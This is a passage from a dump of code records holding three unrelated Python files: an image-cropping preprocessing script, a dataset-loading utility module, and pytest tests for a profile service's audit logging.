'sink', '1': 'pear', '2': 'moustache', '3': 'nose', '4': 'skateboard',\r\n '5': 'penguin', '6': 'peanut', '7': 'skull', '8':'panda', '9': 'paintbrush',\r\n '10': 'nail', '11': 'apple', '12': 'rifle', '13': 'mug', '14': 'sailboat',\r\n '15': 'pineapple', '16': 'spoon', '17': 'rabbit', '18': 'shovel', '19': 'rollerskates',\r\n '20': 'screwdriver', '21': 'scorpion', '22': 'rhinoceros', '23': 'pool', '24':'octagon',\r\n '25':'pillow', '26': 'parrot', '27': 'squiggle', '28': 'mouth', '29': 'empty', '30': 'pencil'}\r\n\r\n\r\n\r\n# 
Set up X (training/validation set and test set)\r\nfor idx, x in enumerate(x_train_list[:, 1]):\r\n x_train[idx] = x\r\n \r\nfor idx, x in enumerate(x_test_list[:, 1]):\r\n x_test[idx] = x\r\n\r\nprint(x_test.shape, x_train.shape)\r\n\r\n# Set up y arrays (both binary and non-binary)\r\ny_categories = []\r\nfor target_category in train_labels['Category']:\r\n y_categories.append(target_category)\r\n \r\nnb_examples = len(y_categories)\r\ny_train = np.zeros((nb_examples, nb_classes))\r\ny_train_non_bin = np.zeros((nb_examples,))\r\n\r\n# Look through the category list; if the category matches an index from the lookup table,\r\n# we'll assign that index to the corresponding location in the training y-vector\r\nfor idx, category in enumerate(y_categories):\r\n for index, image in look_up.items(): \r\n if image == category:\r\n y_train[idx, int(index)] = 1\r\n y_train_non_bin[idx] = int(index)\r\n\r\n# Shapes should be nb_examples x nb_features and nb_examples x nb_classes for x and y\r\n\r\n\r\nx_train /= 255\r\nx_test /= 255\r\n\r\n#center_ind_list_row = []\r\n#center_ind_list_col = []\r\n#for i in range(x_train.shape[0]):\r\n# img = (x_train[i].reshape(100,100))\r\n# center_ind_list_col.append((ndimage.measurements.center_of_mass(img)[0]))\r\n# center_ind_list_row.append((ndimage.measurements.center_of_mass(img)[1]))\r\n#\r\n#center_ind_list_row = np.array(center_ind_list_row)\r\n#center_ind_list_col = np.array(center_ind_list_col)\r\n#\r\n#for j in range(10):\r\n# img = (x_train[j].reshape(100,100))\r\n# plt.imshow(img)\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n# centre_ind = ndimage.measurements.center_of_mass(img)\r\n# \r\n# size_of_crop = 30\r\n# centre_row = int(round(centre_ind[1]))\r\n# centre_col = int(round(centre_ind[0]))\r\n# #img_crop = img[46-20:46+20,39-20:39+20]\r\n# img_crop = img[(centre_row-size_of_crop):(centre_row+size_of_crop),(centre_col-size_of_crop):(centre_col+size_of_crop)]\r\n# plt.imshow(img_crop)\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n# print (\"IMAGE # = \",j)\r\n#i = 125\r\nx_train_crop = []\r\nfor i in range(x_train.shape[0]):\r\n img = (x_train[i].reshape(100,100))\r\n plt.imshow(img)\r\n plt.axis(\"off\")\r\n plt.show()\r\n size_of_crop = 20\r\n x = 0\r\n y = 0\r\n x_crop = 20\r\n y_crop = 20\r\n number = 0\r\n all_crop_list = []\r\n for row in range(5):\r\n for col in range(5):\r\n #centre_ind = ndimage.measurements.center_of_mass(img, index = [1,2])\r\n # centre_row = int(round(centre_ind[1]))\r\n # centre_col = int(round(centre_ind[0]))\r\n #img_crop = img[46-20:46+20,39-20:39+20]\r\n img_crop = img[x:x_crop,y:y_crop]\r\n all_crop_list.append((np.average(img_crop.reshape((img_crop.shape[0]*img_crop.shape[0]),), axis=0),number,x,x_crop,y,y_crop))\r\n# plt.imshow(img_crop)\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n# print(\"size = \", x ,\":\", x_crop,\",\",y ,\":\", y_crop)\r\n y = y + size_of_crop\r\n y_crop = y_crop + size_of_crop\r\n# print ('Number = ', number)\r\n number = number + 1\r\n \r\n x = x + size_of_crop\r\n x_crop = x_crop + size_of_crop\r\n y = 0\r\n y_crop = 20\r\n \r\n all_crop_list = np.array(all_crop_list)\r\n max_avg_index = np.where(all_crop_list == np.max(all_crop_list[:,0]))[0][0]\r\n# print (max_avg_index)\r\n img = (x_train[i].reshape(100,100))\r\n row1 = int(all_crop_list[max_avg_index][2]-size_of_crop)\r\n row2 = int(all_crop_list[max_avg_index][3]+size_of_crop)\r\n col1 = int(all_crop_list[max_avg_index][4]-size_of_crop)\r\n col2 = int(all_crop_list[max_avg_index][5]+size_of_crop)\r\n \r\n size_of_crop = 10\r\n if 
np.where(all_crop_list[max_avg_index] == 0)[0].shape[0] == 1: \r\n zero_val = np.where(all_crop_list[max_avg_index] == 0)[0][0]\r\n if zero_val == 2:\r\n row1 = int(all_crop_list[max_avg_index][2])\r\n row2 = int(all_crop_list[max_avg_index][3]+(size_of_crop*2))\r\n col1 = int(all_crop_list[max_avg_index][4]-size_of_crop)\r\n col2 = int(all_crop_list[max_avg_index][5]+size_of_crop)\r\n if zero_val == 4:\r\n col1 = int(all_crop_list[max_avg_index][4])\r\n col2 = int(all_crop_list[max_avg_index][5]+(size_of_crop*2))\r\n row1 = int(all_crop_list[max_avg_index][2]-size_of_crop)\r\n row2 = int(all_crop_list[max_avg_index][3]+size_of_crop)\r\n \r\n if np.where(all_crop_list[max_avg_index] == 100)[0].shape[0] == 1: \r\n hundred_val = np.where(all_crop_list[max_avg_index] == 100)[0][0]\r\n if hundred_val == 3:\r\n row1 = int(all_crop_list[max_avg_index][2]-(size_of_crop*2))\r\n row2 = int(all_crop_list[max_avg_index][3])\r\n col1 = int(all_crop_list[max_avg_index][4]-size_of_crop)\r\n col2 = int(all_crop_list[max_avg_index][5]+size_of_crop)\r\n if hundred_val == 5:\r\n row1 = int(all_crop_list[max_avg_index][2]-size_of_crop)\r\n row2 = int(all_crop_list[max_avg_index][3]+size_of_crop)\r\n col1 = int(all_crop_list[max_avg_index][4]-(size_of_crop*2))\r\n col2 = int(all_crop_list[max_avg_index][5])\r\n \r\n img_crop = img[row1:row2,col1:col2]\r\n# print (i,img_crop.shape)\r\n x_train_crop.append((img_crop.reshape(img_crop.shape[0]*img_crop.shape[0],)))\r\n# plt.imshow(img_crop)\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n\r\nx_train_crop = np.array(x_train_crop)\r\n\r\n\r\nplt.imshow(x_train_crop[2].reshape(40,40))\r\nplt.axis(\"off\")\r\nplt.show()\r\n", "sub_path": "try_rescale_2.py", "file_name": "try_rescale_2.py", "file_ext": "py", "file_size_in_byte": 6950, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.load", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "numpy.average", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 177, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}]} +{"seq_id": "105543785", "text": "# -*- coding: utf-8 -*-\n# @Time : 2018/11/12 12:53 AM\n# @Author : Muximus\n# @Site : \n# @File : data_wapper.py\n# @Software: PyCharm\nimport os\nimport sys\nimport numpy as np\nimport logging\nfrom abc import ABC, abstractmethod, ABCMeta\nimport math\nimport pandas as pd\nimport types\n\n_root = os.path.normpath(\"%s/..\" % os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(_root)\nlogger = logging.getLogger(__name__)\nfrom utils.data_helper import *\nfrom utils.batch_generator import BathGenOneNoneInf\nfrom utils.multiprocess_helper import WorkerWrapper, MultiProcess\nfrom typing import List, TypeVar, Sequence, Generic, Callable\nimport collections\n\nIntStringList = TypeVar('IntStringList', int, str, List[int], List[str])\nIntOrNone = TypeVar('IntOrNone', int, type(None))\n\n\nclass MatDataFile:\n def __init__(self, data_dir, data_name, suffix, keys):\n \"\"\"specific one data for special type\n\n # Arguments\n data_dir: data directory\n data_name: data file name without suffix\n suffix: .npz or .npy or .mat\n keys: if data is .npz or .mat with multi datas, should specific keys for those data.\n \"\"\"\n if suffix not in ['npz', 'npy', 'mat', 'dat']:\n raise AssertionError('not supported data type')\n self.data_dir = data_dir\n self.data_name = data_name\n self.suffix = suffix\n self.keys = keys\n\n def load_data(self):\n return load_mat_common(self.suffix, self.data_dir, self.data_name, self.keys)\n\n\nclass Dataset(ABC):\n \"\"\"创建数据管道, 处理数据变化,兼容数据文件类型\"\"\"\n\n def __init__(self, **kwargs):\n self._data = None\n self._label = None\n pass\n\n @staticmethod\n def from_mat(data_files: List[MatDataFile]):\n return MatDataSet(data_files)\n\n @staticmethod\n def from_files(files: List[str], feature: int, word_index: dict, msl: int, find_new_word: bool, cleanable: bool, qid_index: Union[dict, type(None)], seps: List[str],\n headers: List[IntOrNone],\n data_axises: List[int], qid_axises: Union[List[int], type(None)],\n label_str_axises: Union[List[int], type(None)],\n drop_values: List[IntStringList],\n drop_axises: List[int], usecols_all: List[list]):\n return FilesDataSet(files, feature, word_index, msl, find_new_word, cleanable, qid_index, seps, headers, data_axises, qid_axises, label_str_axises, drop_values,\n drop_axises, usecols_all)\n\n @staticmethod\n def from_text_sequence(qids, sentences, label_strs, feature, word_index, qid_index, msl: int = 35, find_new_word: bool = False, cleanable: bool = False):\n return TextDataSet(qids, sentences, label_strs, feature, word_index, qid_index, msl, find_new_word, cleanable)\n\n @staticmethod\n def from_mmap(data_files: List[MatDataFile], concat_file: str):\n return MmapDataSet(data_files, concat_file)\n\n @property\n def data(self):\n return self._data\n\n @data.setter\n def data(self, data):\n self._data = data\n\n @property\n def label(self):\n return self._label\n\n @label.setter\n def label(self, label):\n self._label = label\n\n def custom_map(self, func: Callable[[np.ndarray], np.ndarray]):\n self._data = func(self.data)\n\n def custom_reduce_map(self, nums, worker_func: 
Callable[[np.ndarray], np.ndarray], listener_func: Callable):\n length = self.data.shape[0]\n batch_size = int(math.ceil(length / nums))\n data_generator = BathGenOneNoneInf(length, batch_size, False).build_generator()\n workers = []\n for i_data, data in enumerate(data_generator):\n worker = WorkerWrapper(worker_func, 'data:{}'.format(i_data), (data,))\n workers.append(worker)\n listener = WorkerWrapper(listener_func, 'data_listener', ('kill',))\n mltp = MultiProcess(workers, listener, 'kill')\n self._data = mltp.run()\n return self\n\n @property\n def output_shape(self):\n return self._data.shape\n\n def save(self, data_dir, data_name, suffix: str):\n if self.data is not None:\n save_mat_common(suffix, data_dir, data_name, None, self.data)\n return self\n\n\nclass MmapDataSet(Dataset):\n\n def __init__(self, data_files: List[MatDataFile], concat_file: str):\n super(MmapDataSet, self).__init__()\n if len(data_files) == 1:\n self._data = data_files[0].load_data()\n else:\n mmap = MmapUtil(concat_file)\n for data_file in data_files:\n mmap.save(data_file.load_data())\n self._data = mmap.load()\n\n\nclass MatDataSet(Dataset):\n \"\"\"Load .mat data and other file types\"\"\"\n\n def __init__(self, data_files: List[MatDataFile]):\n \"\"\"train and test data need to be saved separately\"\"\"\n super(MatDataSet, self).__init__()\n if len(data_files) == 1:\n self._data = data_files[0].load_data()\n else:\n datas = []\n for data_file in data_files:\n datas.append(data_file.load_data())\n self._data = np.concatenate(datas, 0)\n\n\nclass TextDataSet(Dataset):\n def __init__(self, qids, sentences, label_strs, feature, word_index, qid_index, msl: int = 35, find_new_word: bool = False, cleanable: bool = False):\n super(TextDataSet, self).__init__()\n if not word_index and not find_new_word:\n raise AssertionError('must specify find_new_word=True when using an empty word_index for data processing')\n self.word_index = word_index\n self.qids = qids\n self.sentences = sentences\n self.feature = feature\n self.msl = msl\n self.find_new_word = find_new_word\n self.cleanable = cleanable\n self.total_len = len(sentences)\n if not qid_index and qids is not None:\n self.qid_index, self.qid_sample_num, self.qid_sample_index, self.label_str_qid = label_str_qid_process(qids, label_strs)\n else:\n self.qid_index = qid_index\n self.data_generator = None\n\n def reduce(self, nums):\n batch_size = int(math.ceil(self.total_len / nums))\n self.data_generator = BathGenOneNoneInf(self.sentences, batch_size, False).build_generator()\n return self\n\n def upsample(self, min_sample):\n if self._data is None or self._label is None:\n raise AssertionError('don\\'t upsample before map, or data is None')\n self._data, self._label = up_sample(self._data, self._label, min_sample)\n return self\n\n def map(self):\n if self.data_generator:\n workers = []\n for i_data, data in enumerate(self.data_generator):\n if not self.find_new_word:\n worker = WorkerWrapper(parallel_str2mat, 'data:{}'.format(i_data), (data, self.word_index, self.msl, self.cleanable, self.feature))\n else:\n worker = WorkerWrapper(parallel_str2mat_find_new_word, 'data:{}'.format(i_data), (data, self.word_index, self.msl, self.cleanable, self.feature))\n workers.append(worker)\n listener = WorkerWrapper(parallel_data_listener, 'data_listener', ('kill',))\n mltp = MultiProcess(workers, listener, 'kill')\n self._data = mltp.run()\n else:\n if not self.find_new_word:\n self._data = str2mat(self.sentences, self.word_index, self.msl, self.cleanable, self.feature)\n else:\n self._data = 
str2mat_find_new_word(self.sentences, self.word_index, self.msl, self.cleanable, self.feature)\n self._label = np.asarray(list(map(lambda q: self.qid_index[q], self.qids))) if self.qids is not None else None\n return self\n\n def test_data(self, sample_rate: int = 1000):\n texts = mat2str(self._data, self.word_index)\n index_qid = {index: qid for qid, index in self.qid_index.items()} if self.qid_index else None\n for i, text in enumerate(texts):\n if i % sample_rate == 0:\n if self._label is not None:\n label = self._label[i]\n qid = index_qid[label]\n logger.info('label:{},qid:{},sen:{}'.format(label, qid, text))\n else:\n logger.info(text)\n\n return self\n\n\nclass FilesDataSet(Dataset):\n def __init__(self, files: List[str], feature: int, word_index: dict, msl: int, find_new_word: bool, cleanable: bool, qid_index: Union[dict, type(None)],\n seps: List[str], headers: List[IntOrNone],\n data_axises: List[int], qid_axises: Union[List[int], type(None)],\n label_str_axises: Union[List[int], type(None)], drop_values: List[IntStringList],\n drop_axises: List[int], usecols_all: List[list]):\n \"\"\"use columns of [label_str sentences] or [qid label_str sentences]\"\"\"\n super(FilesDataSet, self).__init__()\n if not word_index and not find_new_word:\n raise AssertionError('empty word_index for data processing')\n if len(np.asarray(usecols_all).shape) != 2:\n raise AssertionError('can\\'t concat dataframes with different dims; usecols for every file should have the same number of columns')\n assert feature in [0, 1]\n if not word_index and not find_new_word:\n raise AssertionError('empty word_index for data processing')\n self.word_index = word_index\n self.feature = feature\n self.msl = msl\n self.find_new_word = find_new_word\n self.cleanable = cleanable\n self.data_generator = None\n dfs = []\n for i_file, file_dir in enumerate(files):\n sep = seps[i_file] if len(seps) > 1 else seps[0]\n header = headers[i_file] if len(headers) > 1 else headers[0]\n usecols = usecols_all[i_file] if len(usecols_all) > 1 else usecols_all[0]\n qid_axis = qid_axises[i_file] if len(qid_axises) > 1 else qid_axises[0]\n label_str_axis = label_str_axises[i_file] if len(label_str_axises) > 1 else label_str_axises[0]\n data_axis = data_axises[i_file] if len(data_axises) > 1 else data_axises[0]\n if file_dir.endswith('.csv'):\n df = pd.read_csv(open(file_dir, 'rU'), engine='c', sep=sep, na_filter=False, skipinitialspace=True, header=header, usecols=usecols)\n elif file_dir.endswith('.xlsx'):\n df = pd.read_excel(file_dir, engine='c', header=header, usecols=usecols)\n else:\n # neither csv nor xlsx, skip this file\n continue\n logger.info('=========> data:{} shape source:{}'.format(file_dir[file_dir.rindex('/'):], df.shape))\n # custom dropping of certain rows\n if drop_values is not None and drop_axises is not None:\n drop_value = drop_values[i_file] if len(drop_values) > 1 else drop_values[0]\n drop_axis = drop_axises[i_file] if len(drop_axises) > 1 else drop_axises[0]\n col_key = df.keys()[drop_axis]\n # filter multiple values: several labels or several label ids\n if isinstance(drop_value, list):\n for d_value in drop_value:\n df = df[df[col_key] != d_value]\n else:\n df = df[df[col_key] != drop_value]\n logger.info('=========> data shape after drop:{}'.format(df.shape))\n # normalize the column order, otherwise concat fails\n if len(usecols) == 3 and label_str_axis != qid_axis:\n df = df[[df.keys()[qid_axis], df.keys()[label_str_axis], df.keys()[data_axis]]]\n logger.info('=========> data shape final:{}'.format(df.shape))\n elif len(usecols) == 2 and label_str_axis == qid_axis:\n assert qid_axis != data_axis\n df = 
df[[df.keys()[qid_axis], df.keys()[data_axis]]]\n logger.info('=========> data shape final:{}'.format(df.shape))\n elif len(usecols) == 1:\n df = df[[df.keys()[data_axis]]]\n else:\n raise AssertionError('usecols wrong!')\n # avoid mismatched columns\n if len(dfs) > 0:\n df.columns = dfs[0].columns\n # append to the list\n dfs.append(df)\n all_df = pd.concat(dfs)\n logger.info('=========>all data shape:{}'.format(all_df.shape))\n if all_df.shape[1] == 3:\n qids = all_df[all_df.keys()[0]].values\n label_strs = all_df[all_df.keys()[1]].values\n sentences = all_df[all_df.keys()[2]].values\n elif all_df.shape[1] == 2:\n qids = all_df[all_df.keys()[0]].values\n sentences = all_df[all_df.keys()[1]].values\n label_strs = None\n elif all_df.shape[1] == 1:\n qids = None\n sentences = all_df[all_df.keys()[0]].values\n label_strs = None\n else:\n raise AssertionError('all_df wrong!')\n self.word_index = word_index\n self.qids = qids\n self.sentences = sentences\n self.feature = feature\n self.msl = msl\n self.find_new_word = find_new_word\n self.cleanable = cleanable\n self.total_len = len(sentences)\n if not qid_index and qids is not None:\n self.qid_index, self.qid_sample_num, self.qid_sample_index, self.label_str_qid = label_str_qid_process(qids, label_strs)\n else:\n self.qid_index = qid_index\n self.data_generator = None\n\n def reduce(self, nums):\n batch_size = int(math.ceil(self.total_len / nums))\n self.data_generator = BathGenOneNoneInf(self.sentences, batch_size, False).build_generator()\n return self\n\n def upsample(self, min_sample):\n if self._data is None or self._label is None:\n raise AssertionError('don\\'t upsample before map, or data is None')\n self._data, self._label = up_sample(self._data, self._label, min_sample)\n return self\n\n def map(self):\n if self.data_generator:\n workers = []\n for i_data, data in enumerate(self.data_generator):\n if not self.find_new_word:\n worker = WorkerWrapper(func=parallel_str2mat, info='data:{}'.format(i_data), func_params=(data, self.word_index, self.msl, self.cleanable, self.feature))\n else:\n worker = WorkerWrapper(func=parallel_str2mat_find_new_word, info='data:{}'.format(i_data),\n func_params=(data, self.word_index, self.msl, self.cleanable, self.feature))\n workers.append(worker)\n listener = WorkerWrapper(func=parallel_data_listener, info='data_listener', func_params=('kill',))\n mltp = MultiProcess(workers, listener, 'kill')\n self._data = mltp.run()\n else:\n if not self.find_new_word:\n self._data = str2mat(self.sentences, self.word_index, self.msl, self.cleanable, self.feature)\n else:\n self._data = str2mat_find_new_word(self.sentences, self.word_index, self.msl, self.cleanable, self.feature)\n self._label = np.asarray(list(map(lambda q: self.qid_index[q], self.qids))) if self.qids is not None else None\n return self\n\n def test_data(self, sample_rate: int = 1000):\n texts = mat2str(self._data, self.word_index)\n index_qid = {index: qid for qid, index in self.qid_index.items()} if self.qid_index else None\n for i, text in enumerate(texts):\n if i % sample_rate == 0:\n if self._label is not None:\n label = self._label[i]\n qid = index_qid[label]\n logger.info('label:{},qid:{},sen:{}'.format(label, qid, text))\n else:\n logger.info(text)\n\n return self\n\n\nif __name__ == '__main__':\n pass\n", "sub_path": "utils/dataset.py", "file_name": "dataset.py", "file_ext": "py", "file_size_in_byte": 15930, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.normpath", "line_number": 16, 
"usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 18, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.TypeVar", "line_number": 26, "usage_type": "call"}, {"api_name": "abc.ABC", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 63, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 64, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 65, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 66, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 77, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 96, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 96, "usage_type": "attribute"}, {"api_name": "typing.Callable", "line_number": 99, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 99, "usage_type": "attribute"}, {"api_name": "math.ceil", "line_number": 101, "usage_type": "call"}, {"api_name": "utils.batch_generator.BathGenOneNoneInf", "line_number": 102, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 105, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 107, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.MultiProcess", "line_number": 108, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 124, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 138, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 147, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 170, "usage_type": "call"}, {"api_name": "utils.batch_generator.BathGenOneNoneInf", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 185, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 187, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 189, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.MultiProcess", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 197, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 216, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 217, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 218, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 219, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 220, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 225, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 245, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 247, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 
281, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 312, "usage_type": "call"}, {"api_name": "utils.batch_generator.BathGenOneNoneInf", "line_number": 313, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 327, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 329, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 332, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.MultiProcess", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 340, "usage_type": "call"}]} +{"seq_id": "251816071", "text": "import json\nimport logging\nfrom dataclasses import dataclass\nfrom datetime import datetime, timedelta, timezone\nfrom typing import Any, List, Optional\n\nimport pytest\nfrom django.conf import settings\nfrom guardian.shortcuts import assign_perm\n\nfrom open_city_profile.tests.asserts import assert_almost_equal\nfrom open_city_profile.tests.graphql_test_helpers import do_graphql_call_as_user\nfrom profiles.models import (\n Profile,\n VerifiedPersonalInformationPermanentAddress,\n VerifiedPersonalInformationPermanentForeignAddress,\n VerifiedPersonalInformationTemporaryAddress,\n)\nfrom services.tests.factories import ServiceConnectionFactory\n\nfrom .factories import (\n ProfileFactory,\n SensitiveDataFactory,\n VerifiedPersonalInformationFactory,\n)\n\n\n@pytest.fixture(autouse=True)\ndef enable_audit_log():\n settings.AUDIT_LOGGING_ENABLED = True\n\n\n@pytest.fixture\ndef cap_audit_log(caplog):\n def get_logs(self):\n audit_records = [\n r for r in self.records if r.name == \"audit\" and r.levelno == logging.INFO\n ]\n return [json.loads(r.getMessage()) for r in audit_records]\n\n caplog.get_logs = get_logs.__get__(caplog)\n return caplog\n\n\ndef partition_logs_by_target_type(logs, target_type):\n matches = []\n rest = []\n\n for log in logs:\n if log[\"audit_event\"][\"target\"][\"type\"] == target_type:\n matches.append(log)\n else:\n rest.append(log)\n\n return matches, rest\n\n\ndef assert_common_fields(\n log_messages,\n target_profile,\n operation,\n actor_role=\"SYSTEM\",\n target_profile_part=\"base profile\",\n):\n now_dt = datetime.now(tz=timezone.utc)\n now_ms_timestamp = int(now_dt.timestamp() * 1000)\n leeway_ms = 50\n\n if not isinstance(log_messages, list):\n log_messages = [log_messages]\n\n assert len(log_messages) > 0\n\n for log_message in log_messages:\n audit_event = log_message[\"audit_event\"]\n\n assert audit_event[\"origin\"] == \"PROFILE-BE\"\n assert audit_event[\"status\"] == \"SUCCESS\"\n assert audit_event[\"operation\"] == operation\n assert audit_event[\"actor\"][\"role\"] == actor_role\n\n assert_almost_equal(audit_event[\"date_time_epoch\"], now_ms_timestamp, leeway_ms)\n\n log_dt = datetime.strptime(\n audit_event[\"date_time\"], \"%Y-%m-%dT%H:%M:%S.%fZ\"\n ).replace(tzinfo=timezone.utc)\n assert_almost_equal(log_dt, now_dt, timedelta(milliseconds=leeway_ms))\n\n expected_target = {\n \"id\": str(target_profile.pk),\n \"type\": target_profile_part,\n \"user_id\": str(target_profile.user.uuid),\n }\n assert audit_event[\"target\"] == expected_target\n\n\n@dataclass\nclass ProfileWithRelated:\n profile: Profile\n related_part: Optional[Any]\n related_name: Optional[str]\n profile_part_name: Optional[str]\n additional_profile_part_names: List[str]\n\n @property\n def all_profile_part_names(self):\n return [\n name\n for name in [self.profile_part_name] + 
self.additional_profile_part_names\n if name is not None\n ]\n\n\ndef vpi_factory_with_addresses(*wanted_address_models):\n def factory():\n address_args = dict()\n for address_model in [\n VerifiedPersonalInformationPermanentAddress,\n VerifiedPersonalInformationTemporaryAddress,\n VerifiedPersonalInformationPermanentForeignAddress,\n ]:\n if address_model not in wanted_address_models:\n address_args[address_model.RELATED_NAME] = None\n\n return VerifiedPersonalInformationFactory(**address_args)\n\n return factory\n\n\n@pytest.fixture(\n params=[\n (ProfileFactory, None, None, []),\n (SensitiveDataFactory, \"sensitivedata\", \"sensitive data\", []),\n (\n vpi_factory_with_addresses(),\n \"verified_personal_information\",\n \"verified personal information\",\n [],\n ),\n (\n vpi_factory_with_addresses(VerifiedPersonalInformationPermanentAddress),\n \"verified_personal_information__permanent_address\",\n \"verified personal information permanent address\",\n [\"verified personal information\"],\n ),\n (\n vpi_factory_with_addresses(VerifiedPersonalInformationTemporaryAddress),\n \"verified_personal_information__temporary_address\",\n \"verified personal information temporary address\",\n [\"verified personal information\"],\n ),\n (\n vpi_factory_with_addresses(\n VerifiedPersonalInformationPermanentForeignAddress\n ),\n \"verified_personal_information__permanent_foreign_address\",\n \"verified personal information permanent foreign address\",\n [\"verified personal information\"],\n ),\n ]\n)\ndef profile_with_related(request):\n (\n factory,\n related_name,\n profile_part_name,\n additional_profile_part_names,\n ) = request.param\n created = factory()\n if related_name:\n profile = getattr(created, \"profile\")\n related_part = profile\n for field_name in related_name.split(\"__\"):\n related_part = getattr(related_part, field_name)\n else:\n profile = created\n related_part = None\n\n return ProfileWithRelated(\n profile,\n related_part,\n related_name,\n profile_part_name,\n additional_profile_part_names,\n )\n\n\ndef test_audit_log_read(profile_with_related, cap_audit_log):\n related_name = profile_with_related.related_name\n\n profile_from_db = Profile.objects.select_related(related_name).first()\n audit_logs = cap_audit_log.get_logs()\n\n for profile_part_name in profile_with_related.all_profile_part_names:\n related_logs, audit_logs = partition_logs_by_target_type(\n audit_logs, profile_part_name\n )\n\n assert_common_fields(\n related_logs,\n profile_from_db,\n \"READ\",\n target_profile_part=profile_part_name,\n )\n\n assert_common_fields(audit_logs, profile_from_db, \"READ\")\n\n\ndef test_audit_log_update(profile_with_related, cap_audit_log):\n profile = profile_with_related.profile\n related_part = profile_with_related.related_part\n profile_part_name = profile_with_related.profile_part_name\n\n profile.first_name = \"John\"\n profile.save()\n if related_part:\n related_part.save()\n\n audit_logs = cap_audit_log.get_logs()\n\n if profile_part_name:\n related_logs, audit_logs = partition_logs_by_target_type(\n audit_logs, profile_part_name\n )\n\n assert_common_fields(\n 